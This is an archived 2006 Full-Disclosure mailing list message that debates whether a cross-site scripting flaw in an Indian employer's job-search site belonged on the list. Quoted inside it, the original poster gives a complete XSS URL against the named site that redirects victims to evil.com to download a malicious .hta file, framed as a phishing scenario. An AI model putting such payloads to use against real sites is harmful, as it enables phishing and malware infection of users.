lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <8dc64e550601220756g218669c7maeddb8a5e3240884@mail.gmail.com>
Date: Sun Jan 22 15:56:39 2006
From: native.code at gmail.com (Native.Code)
Subject: MBT Xss vulnerability

Nice discussion guys. Perhaps I should have mentioned that XSS about every
site should not be posted to FD. And MBT does *not* attract millions of
job-seekers. It is an Indian employer and IT job-seekers in India, at any
given time, should not be more than one million.

I believe most of subscribers on this list did not have to know this XSS. It
should have been better reported to IT team at MBT.

Best.


On 1/21/06, MuNNa <sant.jadhav@...il.com> wrote:
>
> Hii Bro,
>
> I got the point.You meant to say that Xss for each and every site should
> not be posted here, unless n until it attracts heavy traffic like Yahoo etc.
> I agree to this that MBT doesnt attract that amount of traffic normally  but
> you can target millions of users at one go.
> Like say...there are many groups that post new job vacancies everyday. So
> if i create a url with javascript allowing you to download a file with say
> .hta  extension and  it claims itself to be some form that has to be filled
> by victim in order to apply for job.
> For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script>
> document.location='www.evil.com/applicationform.hta'</script>
>
> If you post this URL in any of the above groups, you can be sure that your
> file will be downloaded  by thousands of users. This is because MBT is one
> of the top employers. Believe me.
>
> Before some one downloads such files and gets his machine compromised, i
> just wanted to warn the users. As number of victims could be large enough to
> create havoc, MBT's Xss vuln was of great concern to me.This is what made
> me post this vuln over here. May be i might have posted it in the wrong
> list. If this is the case, i am sory to cause annoyance to you and others.
>
> Regards;
> Santosh J.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060122/2f1928b6/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ